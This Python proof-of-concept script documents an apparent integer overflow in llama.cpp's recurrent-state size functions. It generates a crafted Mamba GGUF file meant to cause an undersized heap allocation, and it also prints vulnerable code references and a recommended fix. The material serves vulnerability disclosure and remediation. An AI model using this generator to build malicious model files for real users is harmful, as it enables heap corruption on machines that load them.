#!/usr/bin/env python3
"""
PoC: uint32_t integer overflow in llama_hparams::n_embd_s() and n_embd_r()
=====================================================================================

VULNERABILITY SUMMARY:
  In llama.cpp, the functions n_embd_s() and n_embd_r() in src/llama-hparams.cpp
  compute recurrent state buffer sizes using uint32_t arithmetic. When the product
  of attacker-controlled GGUF metadata values exceeds 2^32, silent integer overflow
  causes allocation of undersized buffers. Subsequent writes to these buffers during
  inference cause heap buffer overflow.

AFFECTED FUNCTIONS (src/llama-hparams.cpp):
  1. n_embd_s() line 158: return n_embd * wkv_head_size;          [RWKV6/RWKV7]
  2. n_embd_s() line 169: return ssm_d_state * ssm_d_inner;       [Mamba/Mamba2]
  3. n_embd_s() line 165: return n_embd_head_kda * n_embd_head_kda * n_head(); [Kimi KDA]
  4. n_embd_r() line 134: return token_shift_count * n_embd;       [RWKV6/RWKV7]
  5. n_embd_r() line 139: return n_embd * (n_shortconv_l_cache-1); [LFM2]
  6. n_embd_r() line 152: return (ssm_d_conv-1) * (ssm_d_inner + 2*ssm_n_group*ssm_d_state); [Mamba]

ALLOCATION SITE (src/llama-memory-recurrent.cpp lines 94-95):
  ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size);
  ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size);

  Note: n_embd_r() returns uint32_t, mem_size is uint32_t, so the multiplication
  hparams.n_embd_r()*mem_size is ALSO in uint32_t and may overflow again before
  being widened to int64_t for ggml_new_tensor_1d.

NO INPUT VALIDATION:
  There are no range checks on wkv_head_size, ssm_d_state, ssm_d_inner,
  n_shortconv_l_cache, n_embd_head_kda, or token_shift_count. Values are read
  directly from untrusted GGUF metadata into uint32_t fields.

TRIGGER SEQUENCE:
  1. llama_load_model_from_file() -> load_hparams() reads overflow-inducing values
  2. load_tensors() loads model weights (tensors sized with int64_t, no overflow there)
  3. llama_new_context_with_model() -> create_memory() -> llama_memory_recurrent()
     calls n_embd_s() / n_embd_r() with uint32_t overflow -> undersized allocation
  4. During inference, recurrent state is written into the undersized buffer -> HEAP OOB

ASAN DETECTION:
  Yes, ASan would detect the heap-buffer-overflow during inference when the recurrent
  state write exceeds the allocated buffer. The overflow at step 3 is silent (no UB
  in C/C++ for unsigned wrap-around), but the resulting OOB write at step 4 is
  detected by ASan.

This script generates a minimal GGUF file demonstrating the vulnerability.
"""

import struct
import sys
import os
import numpy as np

# --------------------------------------------------------------------------
# Constants from GGUF specification
# --------------------------------------------------------------------------
GGUF_MAGIC = 0x46554747  # "GGUF" as uint32 little-endian (bytes: 47 47 55 46)
GGUF_VERSION = 3

# GGUF value types
GGUF_TYPE_UINT32  = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING  = 8
GGUF_TYPE_ARRAY   = 9
GGUF_TYPE_UINT8   = 0

# GGML tensor types
GGML_TYPE_F32 = 0

UINT32_MAX = 0xFFFFFFFF


def uint32_overflow(val):
    """Simulate uint32_t overflow (C unsigned wrap-around)."""
    return val & UINT32_MAX
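

# Independent cross-check of C uint32_t wrap-around semantics using ctypes.
# ctypes.c_uint32 truncates its argument modulo 2^32 exactly as the C
# abstract machine does for unsigned arithmetic, giving a second model
# against which the mask-based uint32_overflow() above can be validated.
# (Sketch for sanity-checking only; not part of the PoC trigger itself.)
def c_uint32_wrap(val):
    """Reduce val modulo 2^32, mirroring C uint32_t arithmetic."""
    import ctypes
    return ctypes.c_uint32(val).value

# e.g. c_uint32_wrap(65537 * 65537) == uint32_overflow(65537 * 65537) == 131073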


def analyze_overflow_scenarios():
    """Print analysis of all overflow scenarios."""
    print("=" * 78)
    print("OVERFLOW ANALYSIS FOR ALL VULNERABLE FUNCTIONS")
    print("=" * 78)

    # --- Scenario 1: RWKV6 n_embd_s() ---
    print("\n--- Scenario 1: RWKV6 n_embd_s() = n_embd * wkv_head_size ---")
    n_embd = 65537
    wkv_head_size = 65537
    correct = n_embd * wkv_head_size
    overflowed = uint32_overflow(correct)
    print(f"  n_embd           = {n_embd}")
    print(f"  wkv_head_size    = {wkv_head_size}")
    print(f"  Correct product  = {correct} (0x{correct:X})")
    print(f"  uint32 overflow  = {overflowed} (0x{overflowed:X})")
    print(f"  Ratio            = {correct / overflowed:.1f}x undersized")
    print(f"  Correct buffer (1 seq, f32) = {correct * 4 / (1024**2):.1f} MiB")
    print(f"  Overflow buffer (1 seq, f32) = {overflowed * 4 / (1024**2):.1f} MiB")

    # --- Scenario 2: Mamba n_embd_s() ---
    print("\n--- Scenario 2: Mamba n_embd_s() = ssm_d_state * ssm_d_inner ---")
    n_embd_mamba = 2
    ssm_d_inner = 2 * n_embd_mamba  # constraint: d_inner = 2 * n_embd
    ssm_d_state = (UINT32_MAX // ssm_d_inner) + 2  # just enough to overflow
    correct = ssm_d_state * ssm_d_inner
    overflowed = uint32_overflow(correct)
    print(f"  n_embd           = {n_embd_mamba}")
    print(f"  ssm_d_inner      = {ssm_d_inner} (= 2 * n_embd)")
    print(f"  ssm_d_state      = {ssm_d_state}")
    print(f"  Correct product  = {correct} (0x{correct:X})")
    print(f"  uint32 overflow  = {overflowed} (0x{overflowed:X})")
    print(f"  Ratio            = {correct / max(overflowed, 1):.1f}x undersized")

    # --- Scenario 3: Kimi KDA n_embd_s() ---
    print("\n--- Scenario 3: Kimi KDA n_embd_s() = n_embd_head_kda^2 * n_head ---")
    n_embd_head_kda = 11586  # 11586^2 * 32 > 2^32
    n_head = 32
    correct = n_embd_head_kda * n_embd_head_kda * n_head
    overflowed = uint32_overflow(correct)
    print(f"  n_embd_head_kda  = {n_embd_head_kda}")
    print(f"  n_head           = {n_head}")
    print(f"  Correct product  = {correct} (0x{correct:X})")
    print(f"  uint32 overflow  = {overflowed} (0x{overflowed:X})")
    if overflowed > 0:
        print(f"  Ratio            = {correct / overflowed:.1f}x undersized")
    else:
        print(f"  Wraps to ZERO -- ggml_new_tensor_1d with size 0!")

    # --- Scenario 4: LFM2 n_embd_r() ---
    print("\n--- Scenario 4: LFM2 n_embd_r() = n_embd * (n_shortconv_l_cache - 1) ---")
    n_embd_lfm = 4096
    n_shortconv_l_cache = 1048578  # n_embd * (1048578-1) = 4096 * 1048577 > 2^32
    correct = n_embd_lfm * (n_shortconv_l_cache - 1)
    overflowed = uint32_overflow(correct)
    print(f"  n_embd              = {n_embd_lfm}")
    print(f"  n_shortconv_l_cache = {n_shortconv_l_cache}")
    print(f"  Correct product     = {correct} (0x{correct:X})")
    print(f"  uint32 overflow     = {overflowed} (0x{overflowed:X})")
    print(f"  Ratio               = {correct / overflowed:.1f}x undersized")

    # --- Scenario 5: Mamba n_embd_r() complex ---
    print("\n--- Scenario 5: Mamba n_embd_r() = (d_conv-1)*(d_inner + 2*n_group*d_state) ---")
    ssm_d_conv = 5
    ssm_d_inner_r = 512
    ssm_n_group = 32768
    ssm_d_state_r = 32769
    correct_sub = ssm_d_inner_r + 2 * ssm_n_group * ssm_d_state_r
    correct = (ssm_d_conv - 1) * correct_sub
    overflowed_sub = uint32_overflow(2 * ssm_n_group * ssm_d_state_r)
    overflowed = uint32_overflow((ssm_d_conv - 1) * uint32_overflow(ssm_d_inner_r + overflowed_sub))
    print(f"  ssm_d_conv   = {ssm_d_conv}")
    print(f"  ssm_d_inner  = {ssm_d_inner_r}")
    print(f"  ssm_n_group  = {ssm_n_group}")
    print(f"  ssm_d_state  = {ssm_d_state_r}")
    print(f"  2*n_group*d_state = {2*ssm_n_group*ssm_d_state_r} (correct; still fits in uint32 here)")
    print(f"  2*n_group*d_state = {overflowed_sub} (after uint32 masking)")
    print(f"  Full correct      = {correct}")
    print(f"  Full overflowed   = {overflowed} (the wrap occurs in the outer multiply)")

    # --- Scenario 6: Double overflow at allocation site ---
    print("\n--- Scenario 6: Double overflow at allocation site (line 94-95) ---")
    print("  Even if n_embd_s() doesn't overflow, the multiplication")
    print("  n_embd_s() * mem_size on line 95 is ALSO in uint32_t!")
    n_embd_s_val = 65536  # legitimate n_embd_s value
    mem_size = 65537
    correct = n_embd_s_val * mem_size
    overflowed = uint32_overflow(correct)
    print(f"  n_embd_s() = {n_embd_s_val}")
    print(f"  mem_size   = {mem_size}")
    print(f"  Correct    = {correct} (0x{correct:X})")
    print(f"  Overflowed = {overflowed} (0x{overflowed:X})")
    print(f"  Ratio      = {correct / max(overflowed, 1):.1f}x undersized")

    print("\n" + "=" * 78)
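

# Helper formalizing how the overflow-triggering parameters in the scenarios
# above were chosen: given one factor a, the smallest cofactor b such that
# a * b >= 2^32 and the product therefore wraps in uint32_t (to a value
# smaller than a, possibly 0). The scenarios pick slightly larger cofactors
# so the wrapped result is a small nonzero buffer size. Illustrative helper,
# not llama.cpp code.
def min_cofactor_to_overflow(a):
    """Smallest b with a * b >= 2**32 (ceiling division)."""
    return (2**32 + a - 1) // a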


# --------------------------------------------------------------------------
# GGUF binary writer (minimal, hand-crafted)
# --------------------------------------------------------------------------
def write_gguf_string(f, s):
    """Write a GGUF string (uint64 length + bytes, no null terminator)."""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)
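

# Round-trip reader for the string encoding above (a small self-check helper,
# not required by the PoC): parses the uint64 little-endian length prefix and
# UTF-8 payload that write_gguf_string() emits.
def read_gguf_string(buf):
    """Read one GGUF string (uint64 LE length + UTF-8 bytes, no NUL
    terminator) from a binary stream."""
    (length,) = struct.unpack('<Q', buf.read(8))
    return buf.read(length).decode('utf-8')

# e.g. buf = io.BytesIO(); write_gguf_string(buf, "mamba"); buf.seek(0)
#      read_gguf_string(buf) -> "mamba"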


def write_gguf_kv_string(f, key, value):
    """Write a string KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_gguf_string(f, value)


def write_gguf_kv_uint32(f, key, value):
    """Write a uint32 KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))


def write_gguf_kv_float32(f, key, value):
    """Write a float32 KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))


def write_gguf_kv_string_array(f, key, values):
    """Write a string array KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        write_gguf_string(f, v)


def write_gguf_kv_float32_array(f, key, values):
    """Write a float32 array KV pair."""
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        f.write(struct.pack('<f', v))


def write_gguf_kv_int32_array(f, key, values):
    """Write an int32 array KV pair."""
    GGUF_TYPE_INT32 = 5  # GGUF value type for int32 (kept local for clarity)
    write_gguf_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_INT32))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        f.write(struct.pack('<i', v))


def write_tensor_info(f, name, ndims, shape, dtype):
    """Write a tensor info entry in the GGUF header.

    Note: currently unused; generate_mamba_poc_gguf() writes tensor info
    inline instead, so it can accumulate per-tensor data offsets.
    """
    write_gguf_string(f, name)
    f.write(struct.pack('<I', ndims))
    for dim in shape:
        f.write(struct.pack('<Q', dim))
    f.write(struct.pack('<I', dtype))
    f.write(struct.pack('<Q', 0))  # data offset placeholder (always 0 here)


def generate_mamba_poc_gguf(output_path):
    """
    Generate a minimal GGUF file targeting the Mamba architecture with
    ssm_d_state and ssm_d_inner values chosen to overflow n_embd_s().

    Due to the constraint d_inner = 2*n_embd and the fact that ssm_d_state
    appears directly in tensor dimensions (ssm_a: {d_state, d_inner}),
    a fully loadable PoC requires large tensors (~16GB+). This PoC creates
    a structurally valid GGUF header demonstrating the overflow parameters.
    Tensor data is provided as minimal stubs.

    For a fully weaponized exploit, one would need to provide correctly-sized
    tensor data, which is feasible (many real models are 16GB+) but impractical
    for a PoC demonstration.
    """
    # Overflow parameters for Mamba n_embd_s()
    n_embd = 2
    n_vocab = 4
    n_layer = 1
    ssm_d_inner = 2 * n_embd  # = 4 (required: d_inner == 2*n_embd)
    ssm_d_state = (UINT32_MAX // ssm_d_inner) + 2  # 1073741825
    ssm_d_conv = 4
    ssm_dt_rank = 1

    correct_n_embd_s = ssm_d_state * ssm_d_inner
    overflowed_n_embd_s = uint32_overflow(correct_n_embd_s)

    print(f"\n{'='*78}")
    print("GENERATING MAMBA PoC GGUF FILE")
    print(f"{'='*78}")
    print(f"  Architecture:    mamba")
    print(f"  n_embd:          {n_embd}")
    print(f"  n_layer:         {n_layer}")
    print(f"  ssm_d_inner:     {ssm_d_inner}")
    print(f"  ssm_d_state:     {ssm_d_state}")
    print(f"  ssm_d_conv:      {ssm_d_conv}")
    print(f"  ssm_dt_rank:     {ssm_dt_rank}")
    print(f"")
    print(f"  n_embd_s() CORRECT value:    {correct_n_embd_s}")
    print(f"  n_embd_s() OVERFLOWED value: {overflowed_n_embd_s}")
    print(f"  Allocated buffer is {correct_n_embd_s / max(overflowed_n_embd_s, 1):.0f}x too small!")
    print(f"")
    print(f"  n_embd_r() = (d_conv-1) * d_inner = {(ssm_d_conv-1) * ssm_d_inner}")
    print(f"  (n_embd_r does not overflow with these params)")
    print()

    # Define tensors needed for Mamba (per llama-arch.cpp lines 1351-1364)
    # NOTE: Tensor shapes include d_state which makes them very large.
    # We provide minimal stub data to demonstrate the GGUF structure.
    tensors = []
    tensor_data_list = []

    def add_tensor(name, shape):
        n_elements = 1
        for d in shape:
            n_elements *= d
        data = np.zeros(min(n_elements, 64), dtype=np.float32)  # stub: only first 64 elements
        tensors.append((name, len(shape), shape, GGML_TYPE_F32))
        tensor_data_list.append(data)

    # Global tensors
    add_tensor("token_embd.weight", [n_embd, n_vocab])
    add_tensor("output_norm.weight", [n_embd])
    add_tensor("output.weight", [n_embd, n_vocab])

    # Per-layer tensors (1 layer)
    for i in range(n_layer):
        add_tensor(f"blk.{i}.attn_norm.weight", [n_embd])
        add_tensor(f"blk.{i}.ssm_in.weight", [n_embd, 2 * ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_conv1d.weight", [ssm_d_conv, ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_conv1d.bias", [ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_x.weight", [ssm_d_inner, ssm_dt_rank + 2 * ssm_d_state])
        add_tensor(f"blk.{i}.ssm_dt.weight", [ssm_dt_rank, ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_dt.bias", [ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_a", [ssm_d_state, ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_d", [ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_out.weight", [ssm_d_inner, n_embd])


    # Write GGUF file
    with open(output_path, 'wb') as f:
        # 14 KV pairs are written below: general.architecture, general.name,
        # mamba.context_length, mamba.embedding_length, mamba.block_count,
        # mamba.ssm.conv_kernel, mamba.ssm.inner_size, mamba.ssm.state_size,
        # mamba.ssm.time_step_rank, mamba.attention.layer_norm_rms_epsilon,
        # tokenizer.ggml.model, tokenizer.ggml.tokens, tokenizer.ggml.scores,
        # tokenizer.ggml.token_type
        n_kv = 14
        n_tensors = len(tensors)

        # GGUF header
        f.write(struct.pack('<I', GGUF_MAGIC))
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))
        f.write(struct.pack('<Q', n_kv))

        # KV data
        write_gguf_kv_string(f, "general.architecture", "mamba")
        write_gguf_kv_string(f, "general.name", "overflow-poc-mamba")
        write_gguf_kv_uint32(f, "mamba.context_length", 2048)
        write_gguf_kv_uint32(f, "mamba.embedding_length", n_embd)
        write_gguf_kv_uint32(f, "mamba.block_count", n_layer)
        write_gguf_kv_uint32(f, "mamba.ssm.conv_kernel", ssm_d_conv)
        write_gguf_kv_uint32(f, "mamba.ssm.inner_size", ssm_d_inner)
        write_gguf_kv_uint32(f, "mamba.ssm.state_size", ssm_d_state)
        write_gguf_kv_uint32(f, "mamba.ssm.time_step_rank", ssm_dt_rank)
        write_gguf_kv_float32(f, "mamba.attention.layer_norm_rms_epsilon", 1e-5)

        # Minimal tokenizer
        write_gguf_kv_string(f, "tokenizer.ggml.model", "gpt2")
        tokens = ["<pad>", "<eos>", "a", "b"]
        write_gguf_kv_string_array(f, "tokenizer.ggml.tokens", tokens)
        write_gguf_kv_float32_array(f, "tokenizer.ggml.scores", [0.0] * len(tokens))
        write_gguf_kv_int32_array(f, "tokenizer.ggml.token_type", [0] * len(tokens))

        # Tensor info
        # NOTE: We write the correct shapes (which are very large for ssm_a, ssm_x)
        # but only provide stub data. This makes the file small but structurally valid.
        # A real exploit would need to provide full tensor data.
        data_offset = 0
        for name, ndims, shape, dtype in tensors:
            write_gguf_string(f, name)
            f.write(struct.pack('<I', ndims))
            for dim in shape:
                f.write(struct.pack('<Q', dim))
            f.write(struct.pack('<I', dtype))
            f.write(struct.pack('<Q', data_offset))
            # Calculate actual data size for this tensor
            n_elements = 1
            for d in shape:
                n_elements *= d
            data_size = min(n_elements, 64) * 4  # f32 = 4 bytes, but we only store stub
            # Align to 32 bytes
            aligned_size = (data_size + 31) & ~31
            data_offset += aligned_size

        # Align to data alignment boundary (default 32)
        current_pos = f.tell()
        alignment = 32
        padding = (alignment - (current_pos % alignment)) % alignment
        f.write(b'\x00' * padding)

        # Tensor data (stubs)
        for data in tensor_data_list:
            f.write(data.tobytes())
            # Pad to 32-byte alignment
            data_size = len(data) * 4
            pad = (alignment - (data_size % alignment)) % alignment
            f.write(b'\x00' * pad)

    file_size = os.path.getsize(output_path)
    print(f"  Output:          {output_path}")
    print(f"  File size:       {file_size} bytes ({file_size/1024:.1f} KiB)")
    print()
    print("  NOTE: This GGUF file has correct overflow-inducing metadata but")
    print("  truncated tensor data. The hparams will parse correctly and the")
    print("  overflow will compute during context creation, but tensor loading")
    print("  will fail due to insufficient data. A full exploit requires ~16GB")
    print("  of tensor data (realistic for real model files).")
    print()
    return output_path
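

# Minimal structural read-back check for the GGUF files written above
# (a hedged self-check, not a full GGUF parser): the first 24 bytes are
# magic (uint32), version (uint32), tensor count (uint64), KV count (uint64),
# all little-endian.
def read_gguf_header(header_bytes):
    """Parse (magic, version, n_tensors, n_kv) from the first 24 bytes."""
    magic, version = struct.unpack_from('<II', header_bytes, 0)
    n_tensors, n_kv = struct.unpack_from('<QQ', header_bytes, 8)
    return magic, version, n_tensors, n_kv

# e.g.: with open(path, 'rb') as fh:
#           assert read_gguf_header(fh.read(24))[0] == GGUF_MAGIC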


def generate_rwkv6_poc_gguf(output_path):
    """
    Generate a minimal GGUF targeting RWKV6 architecture.
    n_embd_s() = n_embd * wkv_head_size overflows to small value.

    For RWKV6, wkv_head_size appears in tensor shape {head_size, n_embd/head_size},
    requiring n_embd >= wkv_head_size. The minimum overflow case is:
      n_embd = 65537, wkv_head_size = 65537
      n_embd_s() = 65537 * 65537 = 4295098369 -> wraps to 131073 in uint32

    However, tensors like time_mix_key {n_embd, n_embd} = {65537, 65537} require
    ~16GB, making a compact PoC file impractical.
    """
    n_embd = 65537
    wkv_head_size = 65537
    n_layer = 1
    n_vocab = 4

    correct_n_embd_s = n_embd * wkv_head_size
    overflowed_n_embd_s = uint32_overflow(correct_n_embd_s)

    correct_n_embd_r = 2 * n_embd  # token_shift_count defaults to 2
    overflowed_n_embd_r = uint32_overflow(correct_n_embd_r)

    print(f"\n{'='*78}")
    print("RWKV6 OVERFLOW ANALYSIS")
    print(f"{'='*78}")
    print(f"  n_embd:          {n_embd}")
    print(f"  wkv_head_size:   {wkv_head_size}")
    print(f"  n_embd_s() correct:    {correct_n_embd_s} ({correct_n_embd_s * 4 / (1024**3):.1f} GiB as f32)")
    print(f"  n_embd_s() overflowed: {overflowed_n_embd_s} ({overflowed_n_embd_s * 4 / (1024**2):.1f} MiB as f32)")
    print(f"  Buffer undersized by:  {correct_n_embd_s / overflowed_n_embd_s:.0f}x")
    print(f"  n_embd_r() correct:    {correct_n_embd_r} (no overflow)")
    print()

    # For RWKV6, key tensors and their sizes:
    print("  Key tensor sizes (showing why full PoC file is large):")
    print(f"    token_embd    {{n_embd, n_vocab}}     = {{{n_embd}, {n_vocab}}}     = {n_embd*n_vocab*4/(1024**2):.1f} MiB")
    print(f"    time_mix_key  {{n_embd, n_embd}}      = {{{n_embd}, {n_embd}}}      = {n_embd*n_embd*4/(1024**3):.1f} GiB")
    print(f"    time_mix_first {{head_sz, n_embd/hs}} = {{{wkv_head_size}, {n_embd//wkv_head_size}}} = {wkv_head_size*(n_embd//wkv_head_size)*4/1024:.1f} KiB")
    print()

    # We don't actually create this file since the tensors would be huge.
    # The Mamba PoC above demonstrates the GGUF structure.
    print("  (RWKV6 GGUF file not generated -- tensor data would be ~16GB)")
    print("  The vulnerability is the same code path as Mamba, just different parameters.")


def print_vulnerable_code():
    """Print the exact vulnerable code for reference."""
    print(f"\n{'='*78}")
    print("VULNERABLE CODE REFERENCES")
    print(f"{'='*78}")
    print("""
FILE: src/llama-hparams.cpp

  Line 131-134 (n_embd_r for RWKV):
    uint32_t llama_hparams::n_embd_r() const {
        if (wkv_head_size != 0) {
            return token_shift_count * n_embd;  // OVERFLOW: uint32 * uint32
        }

  Line 137-139 (n_embd_r for LFM2):
        if (n_shortconv_l_cache != 0) {
            return n_embd * (n_shortconv_l_cache - 1);  // OVERFLOW: uint32 * uint32
        }

  Line 152 (n_embd_r for Mamba):
        return (ssm_d_conv > 0 ? ssm_d_conv - 1 : 0)
             * (ssm_d_inner + 2*ssm_n_group*ssm_d_state);  // OVERFLOW: multiple uint32 ops

  Line 155-158 (n_embd_s for RWKV):
    uint32_t llama_hparams::n_embd_s() const {
        if (wkv_head_size != 0) {
            return n_embd * wkv_head_size;  // OVERFLOW: uint32 * uint32
        }

  Line 161-165 (n_embd_s for Kimi KDA):
        if (n_embd_head_kda != 0) {
            return n_embd_head_kda * n_embd_head_kda * n_head();  // OVERFLOW: triple uint32

  Line 169 (n_embd_s for Mamba):
        return ssm_d_state * ssm_d_inner;  // OVERFLOW: uint32 * uint32

FILE: src/llama-memory-recurrent.cpp

  Line 94-95 (allocation with overflowed size):
    ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size);
    ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size);
    // DOUBLE OVERFLOW: n_embd_r()/n_embd_s() returns uint32_t,
    // multiplication with mem_size (uint32_t) can overflow AGAIN
    // before widening to int64_t parameter of ggml_new_tensor_1d

FILE: src/llama-hparams.h

  All overflow-prone fields are uint32_t (no validation, no range checks):
    Line 44:  uint32_t n_embd;
    Line 62:  uint32_t n_shortconv_l_cache = 0;
    Line 99:  uint32_t wkv_head_size = 0;
    Line 100: uint32_t token_shift_count = 2;
    Line 133: uint32_t ssm_d_conv = 0;
    Line 134: uint32_t ssm_d_inner = 0;
    Line 135: uint32_t ssm_d_state = 0;
    Line 137: uint32_t ssm_n_group = 0;
    Line 140: uint32_t n_embd_head_kda = 0;
""")


def print_fix_recommendation():
    """Print recommended fix."""
    print(f"\n{'='*78}")
    print("RECOMMENDED FIX")
    print(f"{'='*78}")
    print("""
The fix should address both the return type and the arithmetic:

1. Change n_embd_r() and n_embd_s() return types from uint32_t to uint64_t:

   uint64_t llama_hparams::n_embd_r() const {
       if (wkv_head_size != 0) {
           return (uint64_t)token_shift_count * n_embd;
       }
       ...

   uint64_t llama_hparams::n_embd_s() const {
       if (wkv_head_size != 0) {
           return (uint64_t)n_embd * wkv_head_size;
       }
       ...

2. Fix the allocation site in llama-memory-recurrent.cpp:

   // Cast to int64_t before multiplying with mem_size
   ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, (int64_t)hparams.n_embd_r() * mem_size);
   ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, (int64_t)hparams.n_embd_s() * mem_size);

3. Add validation of hparams values after loading from GGUF:

   // Validate that products won't cause unreasonable allocations
   uint64_t embd_s = (uint64_t)ssm_d_state * ssm_d_inner;
   if (embd_s > INT32_MAX) {
       throw std::runtime_error("ssm state size overflow");
   }
""")
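

# Numeric model of the recommended fix (illustrative Python mirroring the
# C++ sketch printed above; the function names here are hypothetical, not
# llama.cpp symbols). Computing the element count in 64-bit arithmetic
# eliminates the wrap that undersizes the buffer.
def alloc_size_u32(n_embd_s, mem_size):
    """Buggy path: the allocation-site multiply wraps modulo 2^32,
    as uint32_t arithmetic does."""
    return (n_embd_s * mem_size) & 0xFFFFFFFF

def alloc_size_u64(n_embd_s, mem_size):
    """Fixed path: widen before multiplying (no wrap below 2^64)."""
    return n_embd_s * mem_size

# Scenario 6 numbers: alloc_size_u32(65536, 65537) == 65536 (undersized),
# while alloc_size_u64(65536, 65537) == 4295032832 (correct).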


def main():
    print("=" * 78)
    print("PoC: uint32_t Integer Overflow in llama_hparams::n_embd_s() / n_embd_r()")
    print("Target: llama.cpp GGUF model loading (recurrent state buffer allocation)")
    print("=" * 78)

    # Analyze all overflow scenarios
    analyze_overflow_scenarios()

    # Print vulnerable code references
    print_vulnerable_code()

    # Generate Mamba PoC GGUF
    poc_dir = os.path.dirname(os.path.abspath(__file__))
    mamba_poc_path = os.path.join(poc_dir, "poc_mamba_overflow.gguf")
    generate_mamba_poc_gguf(mamba_poc_path)

    # Analyze RWKV6 overflow
    generate_rwkv6_poc_gguf(None)

    # Print fix recommendation
    print_fix_recommendation()

    print(f"\n{'='*78}")
    print("SUMMARY")
    print(f"{'='*78}")
    print("""
VULNERABILITY: Integer overflow in n_embd_s()/n_embd_r() (uint32_t arithmetic)

IMPACT: Heap buffer overflow via undersized recurrent state allocation.
  - Attacker crafts GGUF with metadata values whose product exceeds 2^32
  - n_embd_s()/n_embd_r() silently wraps to a small value
  - Small buffer is allocated for recurrent state
  - During inference, full-sized state data is written to undersized buffer
  - Results in heap-buffer-overflow (detectable by ASan)

SEVERITY: High
  - Triggered by loading a malicious GGUF file (no special flags needed)
  - Affects all recurrent architectures: Mamba, Mamba2, RWKV6, RWKV7, LFM2, Kimi
  - No input validation on the overflow-prone metadata fields
  - Overflow is in model loading path, not just inference

ROOT CAUSE: uint32_t return type and arithmetic in n_embd_s()/n_embd_r()
  combined with lack of validation on GGUF metadata values.

AFFECTED CODE:
  - src/llama-hparams.cpp: lines 134, 139, 146, 152, 158, 165, 169
  - src/llama-memory-recurrent.cpp: lines 94-95
  - src/llama-hparams.h: uint32_t field declarations (no range checks)
""")


if __name__ == "__main__":
    main()